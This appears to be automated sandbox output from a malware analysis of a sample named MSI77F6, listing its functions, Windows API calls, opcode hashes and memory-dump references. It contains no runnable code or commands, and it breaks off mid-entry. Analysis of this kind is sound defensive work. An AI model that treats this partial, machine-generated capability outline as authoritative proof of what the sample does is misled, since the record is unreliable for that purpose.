                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                        • String ID:
                                        • API String ID: 3058430110-0
                                        • Opcode ID: 36327638de06e9ef4ea33dfcfa011e872f1c9dd263ad308f863b742f7e36f18a
                                        • Instruction ID: 3aaded0172464adf2fe7918d77f0972205168b8d5a5c024ba0b5d6a4345aa5dd
                                        • Opcode Fuzzy Hash: 36327638de06e9ef4ea33dfcfa011e872f1c9dd263ad308f863b742f7e36f18a
                                        • Instruction Fuzzy Hash: 9B31C130605246EFDF219F74CC45B6A7BA6BFC2310F158628E421871A1E7BADC51D790
                                        Function 007D7AA2 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetForegroundWindow.USER32 ref: 007D7AB6
                                          • Part of subcall function 007B69C9: GetWindowThreadProcessId.USER32(?,00000000), ref: 007B69E3
                                          • Part of subcall function 007B69C9: GetCurrentThreadId.KERNEL32 ref: 007B69EA
                                          • Part of subcall function 007B69C9: AttachThreadInput.USER32(00000000,?,007B8127), ref: 007B69F1
                                        • GetCaretPos.USER32(?), ref: 007D7AC7
                                        • ClientToScreen.USER32(00000000,?), ref: 007D7B00
                                        • GetForegroundWindow.USER32 ref: 007D7B06
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                        • String ID:
                                        • API String ID: 2759813231-0
                                        • Opcode ID: 76a4398b424f86c186f64ff09f750e6f8ce0f56ab95a9f4e19f5844627d38878
                                        • Instruction ID: 47520146f8229f965ddd0424db38fac02b1f17f94cae79f1b9aa7c754f51eb81
                                        • Opcode Fuzzy Hash: 76a4398b424f86c186f64ff09f750e6f8ce0f56ab95a9f4e19f5844627d38878
                                        • Instruction Fuzzy Hash: 6A31F171D00108AFCB10EFB5DC859EFBBF9EF58314B10806AE915E7211E6399E05CBA0
                                        Function 007C497B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 007C49B7
                                          • Part of subcall function 007C4A41: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 007C4A60
                                          • Part of subcall function 007C4A41: InternetCloseHandle.WININET(00000000), ref: 007C4AFD
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Internet$CloseConnectHandleOpen
                                        • String ID:
                                        • API String ID: 1463438336-0
                                        • Opcode ID: 185361a158e7e74e885546ec465a56f58eed7cbdaa060805151286db1dcfb649
                                        • Instruction ID: f5f7c745a36f08322724d3474ea9315bd9e17c57a6fcf4613367c82dcc21c401
                                        • Opcode Fuzzy Hash: 185361a158e7e74e885546ec465a56f58eed7cbdaa060805151286db1dcfb649
                                        • Instruction Fuzzy Hash: A921C631240605BFDB259F60DC14FBFBBAAFF48711F14801EFA0596550EB79E811A7A4
                                        Function 007D8834 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetWindowLongW.USER32(?,000000EC), ref: 007D88A3
                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 007D88BD
                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 007D88CB
                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 007D88D9
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Window$Long$AttributesLayered
                                        • String ID:
                                        • API String ID: 2169480361-0
                                        • Opcode ID: b9b3e96fb05e17deeb0363dfb31e669a09234c38089acc6972bda7044047e972
                                        • Instruction ID: b588585c23ed37137fa2b853bae013f8212136e7bbdf53309f81f6792ac2e50f
                                        • Opcode Fuzzy Hash: b9b3e96fb05e17deeb0363dfb31e669a09234c38089acc6972bda7044047e972
                                        • Instruction Fuzzy Hash: B211B431344110AFDB14AB18CC09FBA77AAEF45320F148119F816C73D1CB78AC00DB95
                                        Function 007C900C Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 007C906D
                                        • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 007C907F
                                        • accept.WS2_32(00000000,00000000,00000000), ref: 007C908C
                                        • WSAGetLastError.WS2_32(00000000), ref: 007C90A3
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ErrorLastacceptselect
                                        • String ID:
                                        • API String ID: 385091864-0
                                        • Opcode ID: 5beb4b9d73f0923ebeed56b87c5a7b2baf7f0e5486e9058f2cdb5945a3dd1ec0
                                        • Instruction ID: 430518f0a468c0ea0b9b53d982c8eff293a9a213f4d92a62048460ef9df3898c
                                        • Opcode Fuzzy Hash: 5beb4b9d73f0923ebeed56b87c5a7b2baf7f0e5486e9058f2cdb5945a3dd1ec0
                                        • Instruction Fuzzy Hash: 7B2157715001149FC720EF69C849A9EBBFCEF49750F00816DF949D7251DB789E41CBA0
                                        Function 007B18E8 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007B2CAA: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,007B18FD,?,?,?,007B26BC,00000000,000000EF,00000119,?,?), ref: 007B2CB9
                                          • Part of subcall function 007B2CAA: lstrcpyW.KERNEL32(00000000,?,?,007B18FD,?,?,?,007B26BC,00000000,000000EF,00000119,?,?,00000000), ref: 007B2CDF
                                          • Part of subcall function 007B2CAA: lstrcmpiW.KERNEL32(00000000,?,007B18FD,?,?,?,007B26BC,00000000,000000EF,00000119,?,?), ref: 007B2D10
                                        • lstrlenW.KERNEL32(?,00000002,?,?,?,?,007B26BC,00000000,000000EF,00000119,?,?,00000000), ref: 007B1916
                                        • lstrcpyW.KERNEL32(00000000,?,?,007B26BC,00000000,000000EF,00000119,?,?,00000000), ref: 007B193C
                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,007B26BC,00000000,000000EF,00000119,?,?,00000000), ref: 007B1970
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: lstrcmpilstrcpylstrlen
                                        • String ID: cdecl
                                        • API String ID: 4031866154-3896280584
                                        • Opcode ID: 03ac110adcb15c1f09e3e2f62105bc0311dcf40171dd87052a12616b0eb748fb
                                        • Instruction ID: 882cb5c2cb173da1ce9331b6a51d4f99acb42c7ebebde74af8ce2357495beb54
                                        • Opcode Fuzzy Hash: 03ac110adcb15c1f09e3e2f62105bc0311dcf40171dd87052a12616b0eb748fb
                                        • Instruction Fuzzy Hash: 9011D636100345EFDB159F34D869EBA77B9FF45350B80802AF806CB250EB39A951C7A0
                                        Function 007B713C Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 007B715C
                                        • _memset.LIBCMT ref: 007B717D
                                        • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 007B71CF
                                        • CloseHandle.KERNEL32(00000000), ref: 007B71D8
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: CloseControlCreateDeviceFileHandle_memset
                                        • String ID:
                                        • API String ID: 1157408455-0
                                        • Opcode ID: a5ddcab1516c2076ed2639291789f387dcd3a2e4dae59192f25344713fa051bf
                                        • Instruction ID: 682a654a8f63f38327408ac8f22b38b12fb7f4e135ef071f7e402f5954f9fcc6
                                        • Opcode Fuzzy Hash: a5ddcab1516c2076ed2639291789f387dcd3a2e4dae59192f25344713fa051bf
                                        • Instruction Fuzzy Hash: 7611947190122C7AD7305B69AC4DFEBBB7CEF85764F10419AF504E7190D2744E80CBA8
                                        Function 007B13D1 Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 007B13EE
                                        • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 007B1409
                                        • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 007B141F
                                        • FreeLibrary.KERNEL32(?), ref: 007B1474
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                        • String ID:
                                        • API String ID: 3137044355-0
                                        • Opcode ID: 8ea089d5e5c5840c17a9520f109a9c56223ccaf782c87502ba69a589a9677f8f
                                        • Instruction ID: 44d17e0d8b94d27716e0c978b9149f64db0a2744521027d55ac54494968cbf94
                                        • Opcode Fuzzy Hash: 8ea089d5e5c5840c17a9520f109a9c56223ccaf782c87502ba69a589a9677f8f
                                        • Instruction Fuzzy Hash: 55217CB1A00249EBDB209F91DC98BEBBBB8EF00744FC08469A61297550DB78EA44DF51
                                        Function 007AC265 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 007AC285
                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007AC297
                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007AC2AD
                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007AC2C8
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: d26ed5ad8f04e68514dbd2905b5571b91e1a565744997a3fe32c6468aacae212
                                        • Instruction ID: 68b4c8f4245a449319f9932f7727160b4c87ac10608bc1e6b1b565bbe9023c84
                                        • Opcode Fuzzy Hash: d26ed5ad8f04e68514dbd2905b5571b91e1a565744997a3fe32c6468aacae212
                                        • Instruction Fuzzy Hash: 7C11487A900218FFEB12DBD8C884F9DBBB4FB49710F204191EA00B7294D671AE10DB94
                                        Function 0078C619 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0078C657
                                        • GetStockObject.GDI32(00000011), ref: 0078C66B
                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 0078C675
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: CreateMessageObjectSendStockWindow
                                        • String ID:
                                        • API String ID: 3970641297-0
                                        • Opcode ID: 9d837b451c78cc6e0e7236fa60df546a8936f2985cef58bc8b709998e45fcf97
                                        • Instruction ID: 1537c2cf1ea6b5c97bd85a106b6aaa263689760c12927e12d573ca492a608a72
                                        • Opcode Fuzzy Hash: 9d837b451c78cc6e0e7236fa60df546a8936f2985cef58bc8b709998e45fcf97
                                        • Instruction Fuzzy Hash: 5111A172601548BFDF125FA09C44EFA7B69FF08364F054221FA1452010D739DC60DBA4
                                        Function 007B49D1 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,007B354D,?,007B45D5,?,00008000), ref: 007B49EE
                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,007B354D,?,007B45D5,?,00008000), ref: 007B4A13
                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,007B354D,?,007B45D5,?,00008000), ref: 007B4A1D
                                        • Sleep.KERNEL32(?,?,?,?,?,?,?,007B354D,?,007B45D5,?,00008000), ref: 007B4A50
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: CounterPerformanceQuerySleep
                                        • String ID:
                                        • API String ID: 2875609808-0
                                        • Opcode ID: 680c7ce2911d8652dd3ac4f2fecde9d9e8888e56d5fe53d2409c0c7dffcb841d
                                        • Instruction ID: 86bdabf43e4fdd84d102788b774ac4aec2cbe620922a90dcfc18fcaa98b741ad
                                        • Opcode Fuzzy Hash: 680c7ce2911d8652dd3ac4f2fecde9d9e8888e56d5fe53d2409c0c7dffcb841d
                                        • Instruction Fuzzy Hash: A1112771D4052CDBCF10AFA5DA89BEEBB79FF09711F018055E941B2241DB389960CBA9
                                        Function 007A5BA2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                        • String ID:
                                        • API String ID: 3016257755-0
                                        • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                        • Instruction ID: 27d1f450b212754d2373f0c6275b1aaf2783884f1a2523d4181f80ba5417ce37
                                        • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                        • Instruction Fuzzy Hash: CC01407200064EFBCF165F84DC45CEE3F62BB5A350B588615FE1859035D23ACAB1AB91
                                        Function 007980E2 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0079869D: __getptd_noexit.LIBCMT ref: 0079869E
                                        • __lock.LIBCMT ref: 0079811F
                                        • InterlockedDecrement.KERNEL32(?), ref: 0079813C
                                        • _free.LIBCMT ref: 0079814F
                                        • InterlockedIncrement.KERNEL32(01763630), ref: 00798167
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                        • String ID:
                                        • API String ID: 2704283638-0
                                        • Opcode ID: 2c59c6f660bc9d0eaba5baf29af3e787957f8ed3af34cafc44439ef8de8cf333
                                        • Instruction ID: e5a493d584be7e5fa56034e6024cf680da84126c2ed13ed13d040c54ed06116d
                                        • Opcode Fuzzy Hash: 2c59c6f660bc9d0eaba5baf29af3e787957f8ed3af34cafc44439ef8de8cf333
                                        • Instruction Fuzzy Hash: D2016D31941626EBCFA5AF64B80A7A97360BF06710F044119F41467391DF3C6842CBD3
                                        Function 00798724 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • __lock.LIBCMT ref: 00798768
                                          • Part of subcall function 00798984: __mtinitlocknum.LIBCMT ref: 00798996
                                          • Part of subcall function 00798984: RtlEnterCriticalSection.NTDLL(00790127), ref: 007989AF
                                        • InterlockedIncrement.KERNEL32(DC840F00), ref: 00798775
                                        • __lock.LIBCMT ref: 00798789
                                        • ___addlocaleref.LIBCMT ref: 007987A7
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                        • String ID:
                                        • API String ID: 1687444384-0
                                        • Opcode ID: ba1a1fa39f2c84f74a3fa7805626f665a1083f23e039d6bd4441d351ed5aed7c
                                        • Instruction ID: dbcc6ab860ea9f0376a070251ca23abd80dd50102e44dfc7f0f82193a424c13f
                                        • Opcode Fuzzy Hash: ba1a1fa39f2c84f74a3fa7805626f665a1083f23e039d6bd4441d351ed5aed7c
                                        • Instruction Fuzzy Hash: 89016D71410B00DFDB60EFB5E809759B7E0FF40325F20890EE099977A0DB78A640CB02
                                        Function 007DE13E Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _memset.LIBCMT ref: 007DE14D
                                        • _memset.LIBCMT ref: 007DE15C
                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00833EE0,00833F24), ref: 007DE18B
                                        • CloseHandle.KERNEL32 ref: 007DE19D
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: _memset$CloseCreateHandleProcess
                                        • String ID:
                                        • API String ID: 3277943733-0
                                        • Opcode ID: 12ca662014a44dec5e472d219b05a89eac32361f7bd83ff96744d8f512300d98
